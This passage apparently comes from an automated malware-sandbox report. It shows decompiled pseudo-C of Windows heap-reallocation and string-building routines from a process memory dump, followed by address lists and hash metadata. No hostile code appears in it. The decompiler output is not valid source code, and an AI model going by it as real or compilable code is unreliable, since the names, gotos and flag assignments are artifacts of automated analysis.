                                                                                                                                                    									__eflags = _t173 & 0x00000800;
                                                                                                                                                    									if((_t173 & 0x00000800) == 0) {
                                                                                                                                                    										L37:
                                                                                                                                                    										_t174 = E0093C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
                                                                                                                                                    										 *(_t255 - 0x24) = _t174;
                                                                                                                                                    										__eflags = _t174;
                                                                                                                                                    										if(_t174 != 0) {
                                                                                                                                                    											_t70 = _t174 - 8; // -8
                                                                                                                                                    											_t254 = _t70;
                                                                                                                                                    											__eflags =  *((char*)(_t254 + 7)) - 5;
                                                                                                                                                    											if( *((char*)(_t254 + 7)) == 5) {
                                                                                                                                                    												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
                                                                                                                                                    												__eflags = _t254;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    											if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                                                                                                                    												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
                                                                                                                                                    												if(__eflags != 0) {
                                                                                                                                                    													_push(0);
                                                                                                                                                    													_push(_t254);
                                                                                                                                                    													_push(_t248);
                                                                                                                                                    													E009CF8EE(_t232, _t248, _t254, __eflags);
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    											__eflags =  *(_t254 + 2) & 0x00000002;
                                                                                                                                                    											if(( *(_t254 + 2) & 0x00000002) == 0) {
                                                                                                                                                    												_t178 =  *(_t254 + 3) & 0xff;
                                                                                                                                                    											} else {
                                                                                                                                                    												_t233 = E00952568(_t254);
                                                                                                                                                    												__eflags =  *(_t248 + 0x40) & 0x08000000;
                                                                                                                                                    												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
                                                                                                                                                    													_t184 = 0;
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    												} else {
                                                                                                                                                    													_t184 = L009C9AF6();
                                                                                                                                                    												}
                                                                                                                                                    												 *_t233 = _t184;
                                                                                                                                                    												_t178 =  *(_t233 + 2) & 0x0000ffff;
                                                                                                                                                    											}
                                                                                                                                                    											 *(_t255 - 0x20) = _t178;
                                                                                                                                                    											__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    											if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    												_t235 =  *(_t254 + 2) & 0x000000ff;
                                                                                                                                                    												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
                                                                                                                                                    												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                                                                                                                    												__eflags =  *_t254;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										L009CFB7A(_t235, _t246, _t248, 1);
                                                                                                                                                    										E009D098E(_t235, _t246, _t248, 0);
                                                                                                                                                    										goto L52;
                                                                                                                                                    									}
                                                                                                                                                    									_t232 = 0;
                                                                                                                                                    									__eflags =  *0xa0792c - _t232; // 0x0
                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                    										goto L37;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    									if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                                                                                                                    										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											_push(0);
                                                                                                                                                    											_push(_t253);
                                                                                                                                                    											_push(_t248);
                                                                                                                                                    											E009CF8EE(0, _t248, _t253, __eflags);
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t253 + 2) & 0x00000002;
                                                                                                                                                    									if(( *(_t253 + 2) & 0x00000002) == 0) {
                                                                                                                                                    										_t193 =  *(_t253 + 3) & 0xff;
                                                                                                                                                    									} else {
                                                                                                                                                    										_t193 =  *(E00952568(_t253) + 2) & 0x0000ffff;
                                                                                                                                                    									}
                                                                                                                                                    									 *(_t255 - 0x20) = _t193;
                                                                                                                                                    									__eflags =  *(_t248 + 0x4c) - _t232;
                                                                                                                                                    									if( *(_t248 + 0x4c) != _t232) {
                                                                                                                                                    										_t235 =  *(_t253 + 2) & 0x000000ff;
                                                                                                                                                    										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
                                                                                                                                                    										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                                                                                                                    										__eflags =  *_t253;
                                                                                                                                                    									}
                                                                                                                                                    									_t194 =  *(_t255 - 0x20);
                                                                                                                                                    									__eflags = _t194 - _t232;
                                                                                                                                                    									if(_t194 != _t232) {
                                                                                                                                                    										__eflags = _t194 -  *0xa0792c; // 0x0
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											goto L37;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa0792e; // 0x0
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											goto L37;
                                                                                                                                                    										}
                                                                                                                                                    										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
                                                                                                                                                    										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
                                                                                                                                                    											_push("HEAP: ");
                                                                                                                                                    											E0097373B();
                                                                                                                                                    										} else {
                                                                                                                                                    											E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    										}
                                                                                                                                                    										_pop(_t235);
                                                                                                                                                    										_push(E009BF719(_t248,  *(_t255 - 0x20)));
                                                                                                                                                    										_push( *(_t255 + 0x14));
                                                                                                                                                    										E0097373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
                                                                                                                                                    										_t256 = _t256 + 0x10;
                                                                                                                                                    										_push(_t232);
                                                                                                                                                    										L36:
                                                                                                                                                    										E009D06F9();
                                                                                                                                                    									}
                                                                                                                                                    									goto L37;
                                                                                                                                                    								}
                                                                                                                                                    								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t219 + 0xc);
                                                                                                                                                    								if( *(_t219 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E0097373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_pop(_t235);
                                                                                                                                                    								_push( *(_t255 + 0x14));
                                                                                                                                                    								E0097373B("About to reallocate block at %p to %x bytes\n",  *0xa07928);
                                                                                                                                                    								_t256 = _t256 + 0xc;
                                                                                                                                                    								_push(0);
                                                                                                                                                    								goto L36;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					 *(_t255 - 0x24) = 0;
                                                                                                                                                    					goto L71;
                                                                                                                                                    				} else {
                                                                                                                                                    					_push( *(_t255 + 0x14));
                                                                                                                                                    					_push( *((intOrPtr*)(_t255 + 0x10)));
                                                                                                                                                    					_push( *(_t255 + 0xc));
                                                                                                                                                    					_push(_t248);
                                                                                                                                                    					E009CE765();
                                                                                                                                                    					L72:
                                                                                                                                                    					return L0092DFA1(_t123);
                                                                                                                                                    				}
                                                                                                                                                    			}




























                                                                                                                                                    0x009d1609
                                                                                                                                                    0x009d1579
                                                                                                                                                    0x009d157b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d157b
                                                                                                                                                    0x009d152f
                                                                                                                                                    0x009d1532
                                                                                                                                                    0x009d1536
                                                                                                                                                    0x009d1558
                                                                                                                                                    0x009d155d
                                                                                                                                                    0x009d1538
                                                                                                                                                    0x009d1550
                                                                                                                                                    0x009d1555
                                                                                                                                                    0x009d1563
                                                                                                                                                    0x009d1571
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1313
                                                                                                                                                    0x009d1316
                                                                                                                                                    0x009d131c
                                                                                                                                                    0x009d1375
                                                                                                                                                    0x009d137a
                                                                                                                                                    0x009d137f
                                                                                                                                                    0x009d1468
                                                                                                                                                    0x009d1472
                                                                                                                                                    0x009d1477
                                                                                                                                                    0x009d147a
                                                                                                                                                    0x009d147c
                                                                                                                                                    0x009d1482
                                                                                                                                                    0x009d1482
                                                                                                                                                    0x009d1485
                                                                                                                                                    0x009d1489
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1494
                                                                                                                                                    0x009d1498
                                                                                                                                                    0x009d149d
                                                                                                                                                    0x009d14a7
                                                                                                                                                    0x009d14aa
                                                                                                                                                    0x009d14ac
                                                                                                                                                    0x009d14ae
                                                                                                                                                    0x009d14af
                                                                                                                                                    0x009d14b0
                                                                                                                                                    0x009d14b0
                                                                                                                                                    0x009d14aa
                                                                                                                                                    0x009d14b5
                                                                                                                                                    0x009d14b9
                                                                                                                                                    0x009d14e3
                                                                                                                                                    0x009d14bb
                                                                                                                                                    0x009d14c1
                                                                                                                                                    0x009d14c3
                                                                                                                                                    0x009d14ca
                                                                                                                                                    0x009d14d3
                                                                                                                                                    0x009d14d3
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14d5
                                                                                                                                                    0x009d14d8
                                                                                                                                                    0x009d14d8
                                                                                                                                                    0x009d14e6
                                                                                                                                                    0x009d14e9
                                                                                                                                                    0x009d14ed
                                                                                                                                                    0x009d14f8
                                                                                                                                                    0x009d14fe
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d14ed
                                                                                                                                                    0x009d1509
                                                                                                                                                    0x009d1511
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1511
                                                                                                                                                    0x009d1385
                                                                                                                                                    0x009d1387
                                                                                                                                                    0x009d138d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1393
                                                                                                                                                    0x009d1396
                                                                                                                                                    0x009d139b
                                                                                                                                                    0x009d13a5
                                                                                                                                                    0x009d13a8
                                                                                                                                                    0x009d13aa
                                                                                                                                                    0x009d13ab
                                                                                                                                                    0x009d13ac
                                                                                                                                                    0x009d13ad
                                                                                                                                                    0x009d13ad
                                                                                                                                                    0x009d13a8
                                                                                                                                                    0x009d13b2
                                                                                                                                                    0x009d13b6
                                                                                                                                                    0x009d13c9
                                                                                                                                                    0x009d13b8
                                                                                                                                                    0x009d13be
                                                                                                                                                    0x009d13be
                                                                                                                                                    0x009d13cc
                                                                                                                                                    0x009d13cf
                                                                                                                                                    0x009d13d2
                                                                                                                                                    0x009d13dd
                                                                                                                                                    0x009d13e3
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13eb
                                                                                                                                                    0x009d13ee
                                                                                                                                                    0x009d13f1
                                                                                                                                                    0x009d13f3
                                                                                                                                                    0x009d13fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1403
                                                                                                                                                    0x009d140a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1412
                                                                                                                                                    0x009d1415
                                                                                                                                                    0x009d1418
                                                                                                                                                    0x009d143a
                                                                                                                                                    0x009d143f
                                                                                                                                                    0x009d141a
                                                                                                                                                    0x009d1432
                                                                                                                                                    0x009d1437
                                                                                                                                                    0x009d1444
                                                                                                                                                    0x009d144e
                                                                                                                                                    0x009d144f
                                                                                                                                                    0x009d145a
                                                                                                                                                    0x009d145f
                                                                                                                                                    0x009d1462
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d13f1
                                                                                                                                                    0x009d1324
                                                                                                                                                    0x009d1327
                                                                                                                                                    0x009d132b
                                                                                                                                                    0x009d134d
                                                                                                                                                    0x009d1352
                                                                                                                                                    0x009d132d
                                                                                                                                                    0x009d1345
                                                                                                                                                    0x009d134a
                                                                                                                                                    0x009d1357
                                                                                                                                                    0x009d1358
                                                                                                                                                    0x009d1366
                                                                                                                                                    0x009d136b
                                                                                                                                                    0x009d136e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d136e
                                                                                                                                                    0x009d130d
                                                                                                                                                    0x009d12be
                                                                                                                                                    0x009d128a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d125c
                                                                                                                                                    0x009d125c
                                                                                                                                                    0x009d125f
                                                                                                                                                    0x009d1262
                                                                                                                                                    0x009d1265
                                                                                                                                                    0x009d1266
                                                                                                                                                    0x009d16b6
                                                                                                                                                    0x009d16bb
                                                                                                                                                    0x009d16bb

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                    • API String ID: 0-3744532478
                                                                                                                                                    • Opcode ID: bef90e7563a27bbd4ce0a3140cee06edde0259af606b6204530e31c143eedc1a
                                                                                                                                                    • Instruction ID: 877b2bc7b9e8619df8f3e8547849c62e79545e2650a2e41be501bdd73b6102f0
                                                                                                                                                    • Opcode Fuzzy Hash: bef90e7563a27bbd4ce0a3140cee06edde0259af606b6204530e31c143eedc1a
                                                                                                                                                    • Instruction Fuzzy Hash: E1C10172540291AFDB25EF64C846FAABBF4AF48714F04C04AF8959B692C738ED41DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0092F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short _v12;
                                                                                                                                                    				short _v24;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				short* _v32;
                                                                                                                                                    				short* _v36;
                                                                                                                                                    				short* _v40;
                                                                                                                                                    				short _v42;
                                                                                                                                                    				signed int _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed short _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				signed short _v64;
                                                                                                                                                    				signed int _v68;
                                                                                                                                                    				signed int _v72;
                                                                                                                                                    				signed int _v76;
                                                                                                                                                    				signed int _v80;
                                                                                                                                                    				signed char* _v84;
                                                                                                                                                    				signed int _v88;
                                                                                                                                                    				char _v92;
                                                                                                                                                    				signed int _v116;
                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                    				intOrPtr _v144;
                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                    				char _v152;
                                                                                                                                                    				char _v156;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __ebp;
                                                                                                                                                    				signed int _t186;
                                                                                                                                                    				short _t194;
                                                                                                                                                    				short* _t196;
                                                                                                                                                    				intOrPtr _t205;
                                                                                                                                                    				signed char* _t206;
                                                                                                                                                    				signed char _t207;
                                                                                                                                                    				signed int _t209;
                                                                                                                                                    				signed short* _t210;
                                                                                                                                                    				void* _t214;
                                                                                                                                                    				signed int _t215;
                                                                                                                                                    				signed int _t219;
                                                                                                                                                    				void* _t221;
                                                                                                                                                    				signed int _t223;
                                                                                                                                                    				signed short _t227;
                                                                                                                                                    				signed char _t232;
                                                                                                                                                    				void* _t237;
                                                                                                                                                    				signed int _t238;
                                                                                                                                                    				signed short _t242;
                                                                                                                                                    				signed int _t245;
                                                                                                                                                    				signed int _t254;
                                                                                                                                                    				void* _t255;
                                                                                                                                                    				signed int _t256;
                                                                                                                                                    				signed short _t260;
                                                                                                                                                    				void* _t266;
                                                                                                                                                    				signed int _t267;
                                                                                                                                                    				signed int _t271;
                                                                                                                                                    				signed short* _t282;
                                                                                                                                                    				signed int _t283;
                                                                                                                                                    				signed int _t287;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t291;
                                                                                                                                                    				intOrPtr* _t296;
                                                                                                                                                    				intOrPtr _t297;
                                                                                                                                                    				signed int _t299;
                                                                                                                                                    				signed int* _t300;
                                                                                                                                                    				signed short _t304;
                                                                                                                                                    				char* _t337;
                                                                                                                                                    				signed int* _t342;
                                                                                                                                                    				signed int _t345;
                                                                                                                                                    				signed short* _t347;
                                                                                                                                                    				signed int _t348;
                                                                                                                                                    				void* _t349;
                                                                                                                                                    				void* _t350;
                                                                                                                                                    
                                                                                                                                                    				_t347 = __esi;
                                                                                                                                                    				_t186 =  *0xa02088; // 0x7745a8fa
                                                                                                                                                    				_v8 = _t186 ^ _t348;
                                                                                                                                                    				_v88 = _a8;
                                                                                                                                                    				_t345 = __edx;
                                                                                                                                                    				_t282 = __ecx;
                                                                                                                                                    				_v56 = __edx;
                                                                                                                                                    				_v156 = 0x40;
                                                                                                                                                    				L0092DFC0( &_v152, 0, 0x3c);
                                                                                                                                                    				_t350 = _t349 + 0xc;
                                                                                                                                                    				_v68 =  *_t282;
                                                                                                                                                    				_v64 = _t282[2];
                                                                                                                                                    				_t337 =  &_v12;
                                                                                                                                                    				_v32 = _t337;
                                                                                                                                                    				_v40 = _t337;
                                                                                                                                                    				_v36 =  &_v12;
                                                                                                                                                    				_t194 = 2;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v44 = 0;
                                                                                                                                                    				_v42 = _t194;
                                                                                                                                                    				_t341 =  &_v68;
                                                                                                                                                    				_v72 = 0;
                                                                                                                                                    				_v60 = 0;
                                                                                                                                                    				_v28 = _t194;
                                                                                                                                                    				_v24 = _t194;
                                                                                                                                                    				_t283 = L0092ED18(3, 0, _t194,  &_v68,  &_v156);
                                                                                                                                                    				if(_t283 >= 0) {
                                                                                                                                                    					__eflags = _a4;
                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                    						L44:
                                                                                                                                                    						_t283 = 0;
                                                                                                                                                    						L2:
                                                                                                                                                    						_t291 = _v36;
                                                                                                                                                    						_t196 = _v32;
                                                                                                                                                    						if(_t291 != 0) {
                                                                                                                                                    							if(_t291 != _t196) {
                                                                                                                                                    								_v88 = _t291;
                                                                                                                                                    								E0092E1C6( &_v92);
                                                                                                                                                    								_t196 = _v32;
                                                                                                                                                    							}
                                                                                                                                                    							_v36 = _t196;
                                                                                                                                                    							_v28 = _v24;
                                                                                                                                                    						}
                                                                                                                                                    						_v40 = _t196;
                                                                                                                                                    						if(_t196 != 0) {
                                                                                                                                                    							 *_t196 = 0;
                                                                                                                                                    						}
                                                                                                                                                    						_v44 = 0;
                                                                                                                                                    						_t198 = _v24;
                                                                                                                                                    						_v42 = _v24;
                                                                                                                                                    						if(_v72 != 0) {
                                                                                                                                                    							L0093B90D(_t198, _v72);
                                                                                                                                                    						}
                                                                                                                                                    						return E0092E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v144 - 0x14;
                                                                                                                                                    					_v72 = _v124;
                                                                                                                                                    					if(_v144 < 0x14) {
                                                                                                                                                    						L48:
                                                                                                                                                    						_t283 = 0xc0150003;
                                                                                                                                                    						goto L2;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v152 - 1;
                                                                                                                                                    					if(_v152 != 1) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t205 = _v148;
                                                                                                                                                    					_t296 = _t205 + 0x10;
                                                                                                                                                    					_v52 = _t296;
                                                                                                                                                    					_t297 =  *_t296;
                                                                                                                                                    					__eflags = _t297 - _v128;
                                                                                                                                                    					if(_t297 > _v128) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t342 = _t205 + 0xc;
                                                                                                                                                    					_v76 = _t342;
                                                                                                                                                    					_t341 =  *_t342;
                                                                                                                                                    					__eflags = _t341 - 0x1fffffff;
                                                                                                                                                    					if(_t341 > 0x1fffffff) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t341 = _t341 << 3;
                                                                                                                                                    					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
                                                                                                                                                    					if(_t297 > (_t283 | 0xffffffff) - _t341) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t341 = _t341 + _t297;
                                                                                                                                                    					__eflags = _t341 - _v128;
                                                                                                                                                    					if(_t341 > _v128) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t206 = _t205 + 4;
                                                                                                                                                    					_v84 = _t206;
                                                                                                                                                    					_t207 =  *_t206;
                                                                                                                                                    					__eflags = _t207 & 0x00000002;
                                                                                                                                                    					if((_t207 & 0x00000002) == 0) {
                                                                                                                                                    						L22:
                                                                                                                                                    						_t287 =  *_v52 + _v132;
                                                                                                                                                    						_t209 = 0;
                                                                                                                                                    						 *_t345 = 0;
                                                                                                                                                    						_t299 =  *_v76;
                                                                                                                                                    						_v52 = _t299;
                                                                                                                                                    						__eflags = _t299;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v48 = _t209;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_t300 = _t287 + 4 + _t209 * 8;
                                                                                                                                                    							_t341 =  *_t300;
                                                                                                                                                    							_v76 = _t341;
                                                                                                                                                    							__eflags = _t341 - _v128;
                                                                                                                                                    							if(_t341 > _v128) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							_t210 = _t287 + _t209 * 8;
                                                                                                                                                    							_t341 = (_t341 | 0xffffffff) -  *_t210;
                                                                                                                                                    							__eflags =  *_t300 - _t341;
                                                                                                                                                    							if( *_t300 > _t341) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *_t210 + _v76 - _v128;
                                                                                                                                                    							if( *_t210 + _v76 > _v128) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
                                                                                                                                                    							_t209 = _v48 + 1;
                                                                                                                                                    							__eflags = _t209 - _v52;
                                                                                                                                                    						}
                                                                                                                                                    						_t303 = _v60;
                                                                                                                                                    						__eflags = _t303;
                                                                                                                                                    						if(_t303 != 0) {
                                                                                                                                                    							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
                                                                                                                                                    							__eflags =  *_t345;
                                                                                                                                                    						}
                                                                                                                                                    						_t214 = ( *_t345 & 0x0000ffff) + 2;
                                                                                                                                                    						__eflags = _t214 - 0xfffe;
                                                                                                                                                    						if(_t214 > 0xfffe) {
                                                                                                                                                    							L76:
                                                                                                                                                    							_t283 = 0xc0000106;
                                                                                                                                                    							goto L2;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t345 =  &(_t347[4]);
                                                                                                                                                    							__eflags = _t345;
                                                                                                                                                    							if(_t345 == 0) {
                                                                                                                                                    								L60:
                                                                                                                                                    								_t215 = E009578E5(0, _t345, _t214);
                                                                                                                                                    								__eflags = _t215;
                                                                                                                                                    								if(_t215 >= 0) {
                                                                                                                                                    									_t303 = _v60;
                                                                                                                                                    									L29:
                                                                                                                                                    									_t347[2] =  *_t345;
                                                                                                                                                    									_t347[1] = _t347[8];
                                                                                                                                                    									__eflags = _t303;
                                                                                                                                                    									if(_t303 == 0) {
                                                                                                                                                    										L34:
                                                                                                                                                    										_v48 = _v48 & 0x00000000;
                                                                                                                                                    										__eflags = _v52;
                                                                                                                                                    										if(_v52 != 0) {
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t219 = _v48 << 3;
                                                                                                                                                    												_t304 =  *((intOrPtr*)(_t219 + _t287));
                                                                                                                                                    												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
                                                                                                                                                    												_v80 = _t304;
                                                                                                                                                    												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
                                                                                                                                                    												__eflags = _t221 - 0xfffe;
                                                                                                                                                    												if(_t221 > 0xfffe) {
                                                                                                                                                    													goto L76;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags =  &(_t347[4]);
                                                                                                                                                    												if( &(_t347[4]) == 0) {
                                                                                                                                                    													L68:
                                                                                                                                                    													_t223 = E009578E5(0,  &(_t347[4]), _t221);
                                                                                                                                                    													__eflags = _t223;
                                                                                                                                                    													if(_t223 < 0) {
                                                                                                                                                    														goto L61;
                                                                                                                                                    													}
                                                                                                                                                    													L69:
                                                                                                                                                    													_t347[2] = _t347[4];
                                                                                                                                                    													E00938980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
                                                                                                                                                    													_t227 = _v80;
                                                                                                                                                    													 *_t347 =  *_t347 + _t227;
                                                                                                                                                    													_t347[1] =  *_t347 + _t227 + 2;
                                                                                                                                                    													_t303 = _t347[2];
                                                                                                                                                    													_t341 = 0;
                                                                                                                                                    													_t350 = _t350 + 0xc;
                                                                                                                                                    													_v48 = _v48 + 1;
                                                                                                                                                    													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    													__eflags = _v48 - _v52;
                                                                                                                                                    													if(_v48 == _v52) {
                                                                                                                                                    														goto L35;
                                                                                                                                                    													}
                                                                                                                                                    													continue;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags = _t221 - _t347[8];
                                                                                                                                                    												if(_t221 <= _t347[8]) {
                                                                                                                                                    													goto L69;
                                                                                                                                                    												}
                                                                                                                                                    												goto L68;
                                                                                                                                                    											}
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										L35:
                                                                                                                                                    										_t232 =  *_v84;
                                                                                                                                                    										_t345 = _v56;
                                                                                                                                                    										__eflags = _t232 & 0x00000001;
                                                                                                                                                    										if((_t232 & 0x00000001) != 0) {
                                                                                                                                                    											L42:
                                                                                                                                                    											__eflags =  *_v84 & 0x00000004;
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t341 = _t347;
                                                                                                                                                    												_t283 = E009AC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
                                                                                                                                                    												__eflags = _t283;
                                                                                                                                                    												if(_t283 < 0) {
                                                                                                                                                    													goto L2;
                                                                                                                                                    												}
                                                                                                                                                    												 *_t347 = 0;
                                                                                                                                                    												_t237 = (_v44 & 0x0000ffff) + 2;
                                                                                                                                                    												__eflags = _t237 - 0xfffe;
                                                                                                                                                    												if(_t237 > 0xfffe) {
                                                                                                                                                    													goto L76;
                                                                                                                                                    												}
                                                                                                                                                    												_t288 =  &(_t347[4]);
                                                                                                                                                    												__eflags = _t288;
                                                                                                                                                    												if(_t288 == 0) {
                                                                                                                                                    													L83:
                                                                                                                                                    													_t238 = E009578E5(0, _t288, _t237);
                                                                                                                                                    													__eflags = _t238;
                                                                                                                                                    													if(_t238 < 0) {
                                                                                                                                                    														goto L61;
                                                                                                                                                    													}
                                                                                                                                                    													L84:
                                                                                                                                                    													_t347[2] =  *_t288;
                                                                                                                                                    													E00938980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
                                                                                                                                                    													_t242 = _v44;
                                                                                                                                                    													 *_t347 =  *_t347 + _t242;
                                                                                                                                                    													_t347[1] =  *_t347 + _t242 + 2;
                                                                                                                                                    													_t341 = 0;
                                                                                                                                                    													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    													goto L43;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags = _t237 - _t347[8];
                                                                                                                                                    												if(_t237 <= _t347[8]) {
                                                                                                                                                    													goto L84;
